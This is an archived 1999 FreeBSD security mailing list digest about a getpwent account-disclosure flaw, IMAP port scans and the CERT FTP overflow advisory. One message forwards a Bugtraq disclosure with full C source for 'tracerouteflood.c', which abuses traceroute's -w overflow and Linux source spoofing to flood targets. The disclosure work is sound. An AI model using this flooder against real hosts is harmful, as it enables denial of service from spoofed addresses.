From owner-freebsd-security Sun Feb 14 12:09:39 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA02967 for freebsd-security-outgoing; Sun, 14 Feb 1999 12:09:39 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from asteroid.svib.ru (asteroid.svib.ru [195.151.166.145]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA02958 for ; Sun, 14 Feb 1999 12:09:30 -0800 (PST) (envelope-from tarkhil@asteroid.svib.ru) Received: from shuttle.svib.ru (root@shuttle.svib.ru [195.151.166.144]) by asteroid.svib.ru (8.9.1a/8.9.1) with ESMTP id XAA05073 for ; Sun, 14 Feb 1999 23:09:21 +0300 (MSK) Received: from shuttle.svib.ru (tarkhil@minas-tirith.pol.ru [127.0.0.1]) by shuttle.svib.ru (8.8.8/8.8.8) with ESMTP id XAA01375 for ; Sun, 14 Feb 1999 23:10:35 +0300 (MSK) (envelope-from tarkhil@shuttle.svib.ru) Message-Id: <199902142010.XAA01375@shuttle.svib.ru> X-Mailer: exmh version 2.0.2 2/24/98 To: security@FreeBSD.ORG Reply-To: tarkhil@asteroid.svib.ru Subject: Security bug in getpwent? X-URL: http://freebsd.svib.ru Mime-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Date: Sun, 14 Feb 1999 23:10:34 +0300 From: Alex Povolotsky Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello! I've just noticed that getpwent, returning * as password, doesn't set _PWF_PASS in pw_fields, allowing anyone logged in locally to find all non-passworded accounts and leaving absolutely no traces. I'd consider it a bug. The patch is trivial, should I make it and post? Alex. -- Alexander B. Povolotsky [ICQ 18277558] [2:5020/145] [http://freebsd.svib.ru] [tarkhil@asteroid.svib.ru] [Urgent messages: 234-9696 ΑΒ.#35442 or tarkhil@pager.express.ru] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Feb 14 19:30:16 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA22532 for freebsd-security-outgoing; Sun, 14 Feb 1999 19:30:16 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA22527 for ; Sun, 14 Feb 1999 19:30:12 -0800 (PST) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id NAA04454 for ; Mon, 15 Feb 1999 13:59:55 +1030 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA23043; Mon, 15 Feb 1999 13:59:54 +1030 Date: Mon, 15 Feb 1999 13:59:54 +1030 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: security@FreeBSD.ORG Subject: traceroute as a flooder (fwd) Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The first of the two problems described below also occurs with FreeBSD's traceroute (as of 4.0-CURRENT). Specifically, traceroute -w 2147483647 will not pause between subsequent packet transmissions, leading to a possible use as a packet flooder. I haven't looked at the other problem outlined here. Kris ----- (ASP) Microsoft Corporation (MSFT) announced today that the release of its productivity suite, Office 2000, will be delayed until the first quarter of 1901. ---------- Forwarded message ---------- Date: Sat, 13 Feb 1999 01:38:11 +0100 From: Alfonso De Gregorio To: BUGTRAQ@netspace.org Subject: traceroute as a flooder two traceroute's bugs allow any user (since it's often suided) to use traceroute as a little udp, or (only for versions from 1.4) also icmp, flooder. BTW, i've tested these bugs only on x86 boxes with the most diffused GNU/Linux distro: Debian, Slackware, RedHat (all of them with 2.0.34 kernel), and on an alpha with Digital Unix V4.0 -first bug- waittime value affected systems: x86 linux and alpha digital unix traceroute dosen't handle too higher argument's value of -w option. the limit value dosen't seem to remain costant, but it's never greater than (1<<31)-1 or on the other hand ((1<<(sizeof(int)*8)-1)-1) on systems already tested where the size of an int is 4. AFAIK, the problem is the way is setted the waittime value (waittime = str2val(optarg, "wait time",2,-1);), used in wait_for_reply to wait for a response of a probe. so .. passing an high value to the -w option traceroute will no wait for packets coming back. -second bug- -s (the source address of outgoing probe packets) affected system: x86 linux (maybe others) Usally traceroute check if the source address of the outgoing probe packets matches one of the machine's interface addresses; in case of mismatch, an error is returned and nothing is send on x86 linux traceroute fail this check. in this way anyone can send packets that appear come from a fake address (spoofed) and will not receive response packets (TIME_EXCEEDED or PORT_UNREACHABLE and unexpected packets, too) considerate the maximum number of packets that traceroute can send, the number of packets for second received by the target host, the minimal ICMP packet used by traceroute (IIRC just few bytes for the rtt computation), an udp/icmp flood made using traceroute should be abosultely powerless and no one can make a real DoS againt a victim; however just setting the number of queries (-q), the packetsize, and if we want it also the time-to-live of the first outgoing packet i've frozen a bit a windows box until packets finished. (as a matter of fact since we are not using traceroute to track the route is followed by a packet but we are just trying to flood, if we know the topology of the net between us and the target (eg we are using a link state protocol or we have already checked the number of hops) we can set the time-to-live of the first outgoing packet to the distance.) all in all seemingly the bugs addressed in this mail don't appear to be a big security issue but just a tcp/ip weakness, anyway it's better to be informed :-) IMHO BTW, if you wan't use sth like `traceroute -w $(((1<<31)-1)) -q 8 -f n -s xxx.xxx.xxx.xxx target 1460' or if you wan't try to guess the limit of the waittime value, there are few lines of code, below, (tracerouteflood.c) that show as can be used these tcp/ip weakness; just an example, nothing more ciao fhex "Software is like sex; it's better when it's free" - Linus Torvalds - --cut here-- /* tracerouteflood.c by (fhex) Alfonso De Gregorio a special thanks to: my sister :) Davide (buzzz) Bozzelli a great friend that let me use his alpha Salvatore (antirez) Sanfilippo and Lorenzo (gigi_sull) Cavallaro two friend always available to pay attantion to my nonsenses and take me great advices This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; version 2 of the License. ------------------------------------------------------------------------- WARNING: this program is only for dimostrative use. USE IT AT YOUR OWN RISK! The autors decline responsability caused by bad or malicious use. to compile: gcc -O2 tracerouteflood.c -o tracerouteflood (should copile succesfully on Debian, Slackware, RedHat, DigitalUnix etc.) alfonso de gregorio ------------------------------------------------------------------------- */ #include #include #include #include #include #define TRACEROUTE "/usr/sbin/traceroute" /* traceroute's pathname */ #define MAX_LENGHT 12 /* buffer dimension */ int usage(char *argo) { printf("usage: %s: %s [-I] [-f first_ttl] [-q nqueries] [-s source_ip] hostname [packetlen]\n", argo,argo); printf("\t -I\t\tflood using ICMP ECHO instead of UDP datagrams.\n"); printf("\t -f firt_ttl\tthe initial time-to-live used in the first outgoing packet\n"); printf("\t -q nqueries\tqueries number\n"); printf("\t -s source_ip\tthis ip is the address of the outgoing packets\n"); printf("\n\t(-I and -f switches works only with traceroute 1.4 or higher)\n"); printf("\t[source_ip] can be arbitrary only on linux\n"); printf("\n\tFor example:./tracerouteflood -I -f 2 -q 8 -s xxx.xxx.xxx.xxx dest.somewhere.com 1460\n"); return 1; } int main(int argc, char **argv ) { char badwait[MAX_LENGHT]; pid_t pid_traceroute; register int op; int i,j; char *cmdline[10]={}; if (argc < 2 || argc > 10 ) exit(usage(argv[0])); #ifdef __alpha__ /* an integer overflow */ /* please, if ((1<<(sizeof(int)*8)-1)-1) isn't enought on your system repleace it with just a big number (don't forget to mail me :)*/ sprintf(badwait,"%ld",((1<<(sizeof(int)*8)-1)-1) ); #else snprintf(badwait,MAX_LENGHT,"%ld",((1<<(sizeof(int)*8)-1)-1) ); #endif opterr=0; while ((op = getopt(argc, argv, "If:q:s:")) != EOF) switch (op) { case 'I': cmdline[1]=argv[optind-1]; break; case 'f': cmdline[2]=argv[optind-2]; cmdline[3]=argv[optind-1]; break; case 'q': cmdline[4]=argv[optind-2]; cmdline[5]=argv[optind-1]; break; case 's': /* if you have noticed -s bug also on other systems then linux let free to add here the symbol for the preprocessor (and don't forget to mail me:) */ #ifdef __linux__ cmdline[6]=argv[optind-2]; cmdline[7]=argv[optind-1]; #else printf("since now this bug appeare to be present only on linux\n"); exit(1); #endif break; default: exit(usage(argv[0])); break; } switch (argc - optind) { case 1: cmdline[8]=argv[optind]; break; case 2: cmdline[8]=argv[optind]; cmdline[9]=argv[optind+1]; break; default: exit(usage(argv[0])); } for (i=1;i<9;i++){ if (cmdline[i] == NULL && cmdline[i+1] != NULL) { for(j=i;j<9;j++){ cmdline[j]=cmdline[j+1]; cmdline[j+1]=(char *) NULL; } i=0; } } pid_traceroute = fork(); if ( pid_traceroute == 0) { execl(TRACEROUTE,"traceroute","-w",badwait,cmdline[1],cmdline[2],cmdline[3],cmdline[4],cmdline[5],cmdline[6],cmdline[7],cmdline[8],cmdline[9],NULL); perror("exec: maybe traceroute is not in pre-arranged directory"); exit(1); } if ( waitpid(pid_traceroute, NULL, 0) < 0) { printf("wait error\n"); exit(1); } printf("done\n"); exit(0); } --stop cutting-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Feb 15 04:33:55 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA28174 for freebsd-security-outgoing; Mon, 15 Feb 1999 04:33:55 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from eltex.ru (eltex-spiiras.nw.ru [195.19.204.46] (may be forged)) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA28169 for ; Mon, 15 Feb 1999 04:33:47 -0800 (PST) (envelope-from ark@eltex.ru) From: ark@eltex.ru Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id PAA09478; Mon, 15 Feb 1999 15:33:08 +0300 (MSK) Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Mon, 15 Feb 1999 15:32:33 +0300 Received: from undisclosed-intranet-sender id xma013264; Mon, 15 Feb 99 15:32:17 +0300 Date: Mon, 15 Feb 1999 15:31:08 +0300 Message-Id: <199902151231.PAA16484@paranoid.eltex.spb.ru> In-Reply-To: <199902121652.FAA14099@aniwa.sky> from "Andrew McNaughton " Organization: "Klingon Imperial Intelligence Service" Subject: Re: packet from port 65535 to IMAP? To: andrew@squiz.co.nz Cc: security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, Got my whole network scanned this way too. xxxx frequent check output for period since Feb 14 16:10 to Feb 14 17:10 Security Alerts summary =-=-=-=-=-=-=-=-=-=-=-= Feb 14 16:30:11 xxxx /kernel: securityalert: conn attempt to TCP x.y.z.me:143 from 209.218.208.120:65535 (warlords.net and similar one from asa.ca) What was more interesting is SYN|FIN scan i got some days ago - i've never seen something like that: Security Warnings summary =-=-=-=-=-=-=-=-=-=-=-=-= Feb 10 10:35:54 xxxx /kernel: securitywarning: orphan TCP packet on x.y.z.me:143 from 202.40.17.1:65535 flags 0x3 Is there any new imap vulnerability discovered? Andrew McNaughton said : > >From port 65535. Anyone know what it's about? > > > Feb 12 12:03:37 dawn /kernel: ipfw: 50010 Accept TCP them.them.them.them:65535 > me.me.me.me:143 in via de0 _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNsgTiqH/mIJW9LeBAQG5iAP/RFo2jp124pbbbzVRD3Yi6Zf4zXL6eC2p Ewn/dr4tU9983jT0LjdcQLdEUQFFTmfF8cwAV50JtrUMjLb5OK3PRIAvexBNWpfR 0u/anOmAMxCAFVlQIf8P3lktyFZA7ircL8YEOPx3reWcXWUFjBRSUgbmQ8jyFHqU rqcV/TqJxWg= =At7C -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Feb 15 06:33:46 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA11393 for freebsd-security-outgoing; Mon, 15 Feb 1999 06:33:46 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns3.bassettlaudi.com (ns3.bassettlaudi.com [209.171.9.13]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA11381 for ; Mon, 15 Feb 1999 06:33:44 -0800 (PST) (envelope-from maxim@ns3.bassettlaudi.com) Received: from dell (dell.bassettlaudi.com [209.171.9.190]) by ns3.bassettlaudi.com (8.8.8/8.8.8) with SMTP id JAA01655 for ; Mon, 15 Feb 1999 09:33:47 -0500 (EST) (envelope-from maxim@ns3.bassettlaudi.com) Message-Id: <199902151433.JAA01655@ns3.bassettlaudi.com> From: "Dmitri Maximovich" To: "security@FreeBSD.ORG" Date: Mon, 15 Feb 1999 09:33:37 -0500 Reply-To: "Dmitri Maximovich" X-Mailer: PMMail 98 Professional (2.01.1600) For Windows NT (4.0.1381;3) MIME-Version: 1.0 Content-Type: text/plain; charset="koi8-r" Content-Transfer-Encoding: 7bit Subject: getty exiting due to excessive running time Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi All! I'm using FreeBSD 2.2.8-RELEASE. And few days ago, after upgrade my system to 3Com 905B card and recompiling kernel, I start to receive following messages in /var/log/messagelog: bash-2.02$ tail /var/log/messages Feb 15 03:44:05 xxx getty[28013]: getty exiting due to excessive running time Feb 15 04:21:23 xxx getty[28095]: getty exiting due to excessive running time Feb 15 04:58:17 xxx getty[28191]: getty exiting due to excessive running time Feb 15 05:35:34 xxx getty[28273]: getty exiting due to excessive running time Feb 15 06:11:49 xxx getty[28367]: getty exiting due to excessive running time Feb 15 06:48:52 xxx getty[28452]: getty exiting due to excessive running time Feb 15 07:26:02 xxx getty[28531]: getty exiting due to excessive running time Feb 15 08:02:59 xxx getty[28624]: getty exiting due to excessive running time Feb 15 08:40:19 xxx getty[1403]: getty exiting due to excessive running time Feb 15 09:17:10 xxx getty[1497]: getty exiting due to excessive running time bash-2.02$ Can somebody explain me what's wrong with my system? Thanks in advance! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Feb 15 07:21:51 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA17392 for freebsd-security-outgoing; Mon, 15 Feb 1999 07:21:51 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA17386 for ; Mon, 15 Feb 1999 07:21:49 -0800 (PST) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id MAA21088 for security@freebsd.org; Mon, 15 Feb 1999 12:21:18 -0300 (GMT) From: Fernando Schapachnik Message-Id: <199902151521.MAA21088@ns1.sminter.com.ar> Subject: Secure e-commerce To: security@FreeBSD.ORG Date: Mon, 15 Feb 1999 12:21:18 -0300 (GMT) X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Does anybody know a good, secure and trustable tool to speak SET o something similar (that runs on FreeBSD, of course)? TIA! Fernando P. Schapachnik Administracion de la red VIA Net Works Argentina SA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Feb 15 09:30:10 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA03879 for freebsd-security-outgoing; Mon, 15 Feb 1999 09:30:10 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA03874 for ; Mon, 15 Feb 1999 09:30:07 -0800 (PST) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id MAA09832; Mon, 15 Feb 1999 12:29:28 -0500 (EST) (envelope-from wollman) Date: Mon, 15 Feb 1999 12:29:28 -0500 (EST) From: Garrett Wollman Message-Id: <199902151729.MAA09832@khavrinen.lcs.mit.edu> To: tarkhil@asteroid.svib.ru Cc: security@FreeBSD.ORG Subject: Security bug in getpwent? In-Reply-To: <199902142010.XAA01375@shuttle.svib.ru> References: <199902142010.XAA01375@shuttle.svib.ru> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > I've just noticed that getpwent, returning * as password, doesn't set > _PWF_PASS in pw_fields, allowing anyone logged in locally to find all > non-passworded accounts and leaving absolutely no traces. Don't do that, then. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Feb 15 19:11:34 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA18660 for freebsd-security-outgoing; Mon, 15 Feb 1999 19:11:34 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA18655 for ; Mon, 15 Feb 1999 19:11:32 -0800 (PST) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.8.8/8.8.8) id WAA29938 for freebsd-security@freebsd.org; Mon, 15 Feb 1999 22:13:07 -0500 (EST) (envelope-from cjc) From: "Crist J. Clark" Message-Id: <199902160313.WAA29938@cc942873-a.ewndsr1.nj.home.com> Subject: CA-99-03-FTP-Buffer-Overflows To: freebsd-security@FreeBSD.ORG Date: Mon, 15 Feb 1999 22:13:07 -0500 (EST) Reply-To: cjclark@home.com X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org See, http://www.cert.org/advisories/CA-99-03-FTP-Buffer-Overflows.html For the full text. Is FreeBSD vunerable? I hope that this, > % NetBSD > > % NetBSD All versions ARE NOT vulnerable. Implies FreeBSD is neither. I know FreeBSD and NetBSD use the same ftp, but ftpd? Just looking for verification. Thanks. -- Crist J. Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Feb 16 01:13:28 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA25098 for freebsd-security-outgoing; Tue, 16 Feb 1999 01:13:28 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (p36-max5.wlg.ihug.co.nz [202.49.241.36]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA25093 for ; Tue, 16 Feb 1999 01:13:25 -0800 (PST) (envelope-from andrew@squiz.co.nz) Received: from aniwa.sky (localhost [127.0.0.1]) by aniwa.sky (8.9.1a/8.9.1) with ESMTP id WAA17654; Tue, 16 Feb 1999 22:13:02 +1300 (NZDT) Message-Id: <199902160913.WAA17654@aniwa.sky> X-Mailer: exmh version 2.0.2 2/24/98 To: cjclark@home.com cc: freebsd-security@FreeBSD.ORG Subject: Re: CA-99-03-FTP-Buffer-Overflows In-reply-to: Your message of "Mon, 15 Feb 1999 22:13:07 CDT." <199902160313.WAA29938@cc942873-a.ewndsr1.nj.home.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 16 Feb 1999 22:13:02 +1300 From: Andrew McNaughton Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > See, > > http://www.cert.org/advisories/CA-99-03-FTP-Buffer-Overflows.html > > For the full text. > > Is FreeBSD vunerable? I hope that this, > > > % NetBSD > > > > % NetBSD All versions ARE NOT vulnerable. > > Implies FreeBSD is neither. I know FreeBSD and NetBSD use the same > ftp, but ftpd? Just looking for verification. Thanks. I found it rather curious that FreeBSD's ftpd was not mentioned. Particularly as the PGP signature's version ID said FreeBSD was used, implying that it would have been around for testing. Andrew McNaughton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Feb 16 06:23:40 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA22436 for freebsd-security-outgoing; Tue, 16 Feb 1999 06:23:40 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from weathership.homeport.org (weathership.homeport.org [207.31.235.99]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA22426 for ; Tue, 16 Feb 1999 06:23:37 -0800 (PST) (envelope-from adam@weathership.homeport.org) Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id JAA00356; Tue, 16 Feb 1999 09:39:53 -0500 (EST) Message-ID: <19990216093953.A324@weathership.homeport.org> Date: Tue, 16 Feb 1999 09:39:53 -0500 From: Adam Shostack To: Andrew McNaughton , cjclark@home.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: CA-99-03-FTP-Buffer-Overflows References: <199902160313.WAA29938@cc942873-a.ewndsr1.nj.home.com> <199902160913.WAA17654@aniwa.sky> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93i In-Reply-To: <199902160913.WAA17654@aniwa.sky>; from Andrew McNaughton on Tue, Feb 16, 1999 at 10:13:02PM +1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jordan sent email to security-officer@freebsd.org on Jan 20th or so, and we got no response. We'd be happy to include FreeBSD if we get an answer about the FTPd shipped with the OS. Wu- and pro- are vulnerable. Adam On Tue, Feb 16, 1999 at 10:13:02PM +1300, Andrew McNaughton wrote: | > See, | > | > http://www.cert.org/advisories/CA-99-03-FTP-Buffer-Overflows.html | > | > For the full text. | > | > Is FreeBSD vunerable? I hope that this, | > | > > % NetBSD | > > | > > % NetBSD All versions ARE NOT vulnerable. | > | > Implies FreeBSD is neither. I know FreeBSD and NetBSD use the same | > ftp, but ftpd? Just looking for verification. Thanks. | | I found it rather curious that FreeBSD's ftpd was not mentioned. Particularly as the PGP signature's version ID said FreeBSD was used, implying that it would have been around for testing. | | Andrew McNaughton | | | | | To Unsubscribe: send mail to majordomo@FreeBSD.org | with "unsubscribe freebsd-security" in the body of the message -- "It is seldom that liberty of any kind is lost all at once." -Hume To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Feb 16 06:26:19 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA22842 for freebsd-security-outgoing; Tue, 16 Feb 1999 06:26:19 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from fledge.watson.org (FLEDGE.RES.CMU.EDU [128.2.93.229]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA22833 for ; Tue, 16 Feb 1999 06:26:16 -0800 (PST) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id JAA18762; Tue, 16 Feb 1999 09:25:58 -0500 (EST) Date: Tue, 16 Feb 1999 09:25:58 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Andrew McNaughton cc: cjclark@home.com, freebsd-security@FreeBSD.ORG Subject: Re: CA-99-03-FTP-Buffer-Overflows In-Reply-To: <199902160913.WAA17654@aniwa.sky> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 16 Feb 1999, Andrew McNaughton wrote: > I found it rather curious that FreeBSD's ftpd was not mentioned. > Particularly as the PGP signature's version ID said FreeBSD was used, > implying that it would have been around for testing. I did also, so emailed the author of the advisory about it. I was told that they had problems contacting a vendor to be responsible for the report, although they had verified that the problem did not exist. I forwarded this mail to Jordan and expressed my concern, but from Jordan's response I am guessing that it might actually have been a problem on the part of the advisory author. I emailed the author back again with Jordan's response and inquired as to what routes they had attempted to contact us by, but never received a response. It's not clear to me yet who dropped the ball, but who knows :-). My understanding has always been that our web page is sufficiently clear about who to contact; if I get a response I will continue to follow up on it. Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: 03 01 DD 8E 15 67 48 73 25 6D 10 FC EC 68 C1 1C Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ SafePort Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Feb 16 08:04:20 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA02481 for freebsd-security-outgoing; Tue, 16 Feb 1999 08:04:20 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mtiwmhc06.worldnet.att.net (mtiwmhc06.worldnet.att.net [204.127.131.41]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA02476 for ; Tue, 16 Feb 1999 08:04:19 -0800 (PST) (envelope-from gryphon@healer.com) Received: from healer.com ([12.77.217.97]) by mtiwmhc06.worldnet.att.net (InterMail v03.02.07 118 124) with ESMTP id <19990216152712.IRN14776@healer.com> for ; Tue, 16 Feb 1999 15:27:12 +0000 Message-ID: <36C9B81F.2EB1CA59@healer.com> Date: Tue, 16 Feb 1999 10:25:35 -0800 From: Coranth Gryphon X-Mailer: Mozilla 4.05 [en] (Win95; U) MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: Re: CA-99-03-FTP-Buffer-Overflows References: <199902160313.WAA29938@cc942873-a.ewndsr1.nj.home.com> <199902160913.WAA17654@aniwa.sky> <19990216093953.A324@weathership.homeport.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org | > http://www.cert.org/advisories/CA-99-03-FTP-Buffer-Overflows.html | > For the full text. Given that Wu-FTPd is vunerable, are there any plans to issue a specific patch under FreeBSD for the academ version (2.4.2-b18), or is FreeBSD going to start supporting the VR-series? -coranth To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message